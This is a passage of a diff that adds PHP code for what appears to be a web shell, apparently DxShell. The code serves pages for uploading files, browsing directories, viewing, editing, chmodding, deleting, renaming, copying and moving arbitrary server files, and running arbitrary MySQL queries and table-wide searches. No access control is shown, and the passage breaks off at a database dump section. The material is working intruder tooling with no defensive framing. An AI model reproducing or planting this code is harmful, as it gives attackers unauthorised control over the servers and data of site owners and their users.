+var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row;
+function type_text()
+{
+contents='';row=Math.max(0,index-50);
+while(row<index) contents += tl[row++] + '\r\n';
+document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|';
+if(text_pos++==str_length)
+	{text_pos=0;index++;
+	if(index!=tl.length)
+	{str_length=tl[index].length;setTimeout("type_text()",1000);
+	}
+	} else setTimeout("type_text()",speed);
+}type_text();
+//-->
+</SCRIPT>
+	<?php
+	}
+
+
+		###################################
+
+########
+########   Upload file
+########
+if ($_GET['dxmode']=='UPL')
+	{
+	if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted'));
+
+	if (isset($_FILES['dx_uplfile']['tmp_name']))
+		{
+		$GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']);
+		DxFiles_UploadHere($_POST['dxdir'], $_FILES['dx_uplfile']['name'], $GETFILE);
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>';
+		print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">';
+		print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>';
+		print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>';
+		print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>';
+		print "\n".'<input type=submit value="Upload" class="submit"></form>';
+		}
+	}
+
+		###################################
+
+########
+########   Directory listings
+########
+if ($_GET['dxmode']=='DIR')
+	{
+	if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']);
+	$_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']);
+	if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/';
+
+	print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+	DxGETinForm('leave', 'dxmode');
+	print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>';
+	print "\n".'<input type=submit value="Goto" class="submit"></form>';
+
+	print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>';
+	if (!file_exists($_GET['dxdir'])) die(DxError('No such directory'));
+	if (!is_dir($_GET['dxdir'])) 	  die(DxError('It\'s a file!! What do you think about listing files in a file? =)) '));
+
+	if (isset($_GET['dxparam']))
+		{
+		if ($_GET['dxparam']=='mkDIR')  if (	!mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkDir. Perms?');
+		if ($_GET['dxparam']=='mkFILE') if (	!touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkFile. Perms?');
+		}
+
+	if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...'));
+	$FILES=array('DIRS' => array(), 'FILES' => array());
+	while (!is_bool( $file = readdir($dir_ptr)  ) )
+		if (($file!='.') and ($file!='..'))		if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file;
+	asort($FILES['DIRS']);asort($FILES['FILES']);
+
+	print "\n".'<span style="position:absolute;right:0pt;">';
+	if (isset($_GET['dxdirsimple']))	print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>';
+		else					print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>';
+	print '</span>';
+
+	$folderup_link=explode('/',$_GET['dxdir'].'../');
+	if (!empty($folderup_link[   count($folderup_link)-3   ]) AND ($folderup_link[   count($folderup_link)-3   ]!='..'))
+		unset($folderup_link[   count($folderup_link)-3   ], $folderup_link[   count($folderup_link)-1   ]);
+	$folderup_link=implode('/', $folderup_link);
+	print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>'
+						.DxImg('foldup').' ../</a>';
+
+	print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>'
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>'
+		.' / '.str_repeat('&nbsp;',5)
+		.'<font class=highlight_txt>UPLOAD: </font>'
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>'
+		;
+
+	print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files ';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">';
+	for ($NOWi=0;$NOWi<=1;$NOWi++)
+		for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++)
+			{
+			$cur=&$FILES[$NOW][$i];
+			$dircur=$_GET['dxdir'].$cur;
+			print "\n".'<tr>';
+			print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>'
+							.(($NOW=='DIRS')?DxImg('folder').' '
+							.				 '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'')
+							.(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'')
+							.htmlspecialchars($cur).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				print "\n\t".'<td class=linelisting>'
+					.'<span '.DxDesign_DrawBubbleBox('File Info',    '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>'
+															 		.'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>'
+															 		.'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur))
+															 		, 150).' class=Hover><b>INFO</span> </td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>'
+					.((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'')
+					.'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>';
+				}
+
+			if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>';
+				if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>';
+				print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>';
+				}
+			print "\n\t".'</tr>';
+			}
+	print "\n".'</table>';
+	}
+
+
+########
+########   File Global Actions
+########
+if ('F_'==substr($_GET['dxmode'],0,2))
+	{
+	if (empty($_GET['dxfile']))
+		{
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=text name="dxfile" value="" style="width:70%;">';
+		print "\n".'<br><input type=submit value="Select" class="submit">';
+		print "\n".'</form>';
+		}
+	if (!file_exists(@$_GET['dxfile']))  die(DxError('No such file'));
+	print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+########
+########   File CHMOD
+########
+if ($_GET['dxmode']=='F_CHM')
+	{
+	if (isset($_GET['dxparam']))
+		{
+		if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE)
+			print DxError('Chmod "'.$_GET['dxfile'].'" failed');
+			else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>';
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )';
+		print "\n".'<br><input type=text name="dxparam" value="'.
+			//decoct(fileperms($_GET['dxfile']))
+			substr(sprintf('%o', fileperms($_GET['dxfile'])), -4)
+			.'">';
+		print "\n".'<input type=submit value="chmod" class="submit"></form>';
+		}
+	}
+
+########
+########   File View
+########
+if ($_GET['dxmode']=='F_VIEW')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>';
+	print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>';
+	print "\n".'<td>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>'
+		.'</td>';
+	print "\n".'</tr></table><br>';
+	print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file';
+
+	print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n";
+	print "\n".'<plaintext>';
+	print file_get_contents($_GET['dxfile']);
+	die(); /* Plaintext is infinite */
+	}
+
+########
+########   File Edit
+########
+if ($_GET['dxmode']=='F_ED')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (isset($_POST['dxparam']))
+		{
+		if (!is_writable($_GET['dxfile']))  die(DxError('File is not writable. Perms?...'));
+		if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed'));
+		if (fputs($f, $_POST['dxparam'])===FALSE)	die(DxError('I/O: File write failed'));
+		fclose($f);
+		print 'File saved OK;';
+		}
+		else
+		{
+		if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
+		print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>';
+		print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+		print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>';
+		print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Delete
+########
+if ($_GET['dxmode']=='F_DEL')
+	{
+		if (isset($_GET['dx_ok']))
+			{
+		if ($_GET['dx_ok']=='Yes')
+			{
+			if (	(is_file($_GET['dxfile']) AND !unlink($_GET['dxfile']))  OR  (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile']))		)
+				print DxError('Unable to delete file. Perms?...<br>');
+				else
+				{
+				print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>';
+				DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+				}
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>'
+					."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?'
+					."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>'
+					."\n".'</td></tr></table>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Rename
+########
+if ($_GET['dxmode']=='F_REN')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam']))
+			print DxError('Unable to rename. Perms?...<br>');
+			else
+			{
+			print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+			}
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">';
+		print "\n".'<input type=submit value="Rename" class="submit"></form>';
+		}
+	}
+
+########
+########   File Copy
+########
+if ($_GET['dxmode']=='F_COP')
+	{
+	if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))'));
+
+	$newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3);
+	if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */
+		$newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos);
+	print $newname;
+	if (!copy($_GET['dxfile'], $newname))
+		print DxError('Unable to copy. Perms?...<br>');
+		else
+		{
+		print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>';
+		DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+		}
+	}
+
+########
+########   File Move
+########
+if ($_GET['dxmode']=='F_MOV')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], $_POST['dxparam']))
+			print DxError('Unable to rename. Perms? Or no path?...<br>');
+			else
+			{
+			print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam'])));
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">';
+		print "\n".'<input type=submit value="M0ve" class="submit"></form>';
+		}
+	}
+
+if (substr($_GET['dxmode'],0,2)=='F_')
+	{/* file actions */
+	print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+		###################################
+
+########
+########   SQL Maintenance
+########
+if ($_GET['dxmode']=='SQL')
+	{
+	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p']))
+		{
+		print "\n".'<h2>MySQL connection</h2>';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>';
+		DxGETinForm('leave', 'dxmode');
+		print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">';
+		print "\n".'<br>Login:<input type=text name="dxsql_l" value="" 	 	style="width:200pt">';
+		print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" 	style="width:200pt">';
+		print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>';
+		die();
+		}
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	$mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()"));
+	print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true);
+	for ($i=0;$i<count($DATABASES);$i++)
+		$DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0>'
+				.'<tr><td class=h2_oneline><h1>DB:</h1></td>';
+	if (!isset($_GET['dxsql_d']))
+		{
+		print "\n".'<td class=h2_oneline style="border-width:0pt;">';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p');
+		print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">';
+		print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>';
+		for ($i=0;$i<count($DATABASES);$i++)
+		print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">'
+			.'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0]
+			.'</OPTION>';
+		print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>';
+		print "\n".'</tr></table>';
+		die();
+		}
+		else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>'
+						.'</tr></table>';
+
+	if (!empty($_GET['dxsql_d']))
+		if (!mysql_select_db($_GET['dxsql_d']))
+			die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+	if (!empty($_GET['dxsql_d']))
+		{
+		print "\n\t".'<table  border=0 cellspacing=0 cellpadding=0>';
+		print "\n\t".'<caption>Tables:</caption>';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+		for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+		asort($TABLES);
+		for ($i=0;$i<count($TABLES);$i++)
+			{
+			DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+			print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>';
+			}
+		print "\n\t".'</table>';
+		}
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;';
+	print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Query" class="submit"> '
+				.'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>'
+				.'<br>';
+
+	if (empty($_POST['dxsql_q'])) die('</td></tr></table>');
+	$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+
+	foreach ($_POST['dxsql_q'] as $CUR_Q)
+		{
+		if (empty($CUR_Q)) continue;
+		$CUR_Q.=';';
+
+		$num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false);
+		if ($num<=0) continue;
+
+		print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>';
+
+		$INDEXES=array_keys($FETCHED[0]);
+		print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>';
+		print "\n\t".'<tr><td class="listing"><div align=center  class="highlight_txt">###</td>';
+		foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>';
+		print '</tr>';
+
+		for ($l=0;$l<count($FETCHED);$l++)
+			{
+			print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>';
+			for ($i=0; $i<count($INDEXES); $i++)
+				print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>';
+			}
+
+		print "\n".'</table><br>';
+		}
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Search
+########
+if ($_GET['dxmode']=='SQLS')
+	{
+	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	if (isset($_POST['dxsqlsearch']['txt']))
+		if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" '
+				.(  (isset($_POST['dxsqlsearch']['tables']))?   ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'')   :'SELECTED'  ).'>'
+				.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">';
+	print "\n".'<br>';
+	foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad)
+		print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" '
+			.(  (isset($_POST['dxsqlsearch']['mode']))?   (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'')   :(($cur_rad=='Any')?'CHECKED':'')  )
+			.' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;';
+	print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+
+	if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>');
+
+	if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected'));
+
+	if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt']));
+		else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']);
+
+
+	$GLOBALFOUND=0;
+	foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE)
+		{
+		$Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE ';
+		$Q_ARR=array();
+		DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true);   for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0];
+		foreach ($COLS as $CUR_COL)
+			{
+			if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact')))
+				{
+				for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++)
+				$Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"';
+				}
+				else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0];
+
+			if ($_POST['dxsqlsearch']['mode']=='each')
+				{
+				$Q_ARR_EXACT[]=implode(' AND ', $Q_ARR);
+				$Q_ARR=array();
+				}
+			}
+		if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';';
+		if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );';
+		if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );';
+
+		/* $Q is ready */
+
+		if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0)
+			{
+			$GLOBALFOUND+=$num;
+			print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>';
+			print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>';
+			for ($l=0;$l<count($FETCHED);$l++)
+				{
+				print "\n\t".'<tr>';
+				for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>';
+				print '</tr>';
+				}
+			print "\n".'</table><br>';
+			}
+		}
+	print "\n".'<br>Total: '.$GLOBALFOUND.' matches';
+
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Dump
+########
+if ($_GET['dxmode']=='SQLD')
+	{
